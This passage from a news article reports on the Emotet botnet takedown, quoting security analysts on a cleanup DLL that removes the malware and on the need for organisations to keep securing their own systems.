“The EmotetLoader.dll is a 32-bit DLL responsible for removing the malware from all infected computers. This will ensure that all services related to Emotet will be deleted, the run key in the Windows registry is removed – so that no more Emotet modules are started automatically – and all running Emotet processes are terminated,” Mariya Grozdanova, a threat intelligence analyst at Redscan, stated.

Emotet was particularly nasty in that it spread mainly via malicious attachments in spam emails, and once installed, could bring in additional malware: infected machines were rented out to crooks to install things like ransomware and code that drained victims' online bank accounts. Computer security biz Digital Shadows highlighted the extent of the Emotet epidemic and said its removal is an overall win for everyone. 

Paul Robichaux, senior director of product management at IT forensics firm Quest, stated to The Register: “These kinds of large-scale, coordinated attacks and global botnets are too big for individual organizations to resolve entirely themselves, and leaving individual companies to clean them up themselves is a legitimate national security problem. However, the fact that law enforcement is on the case is no excuse to let your guard down. You still need to focus on securing your own environments.”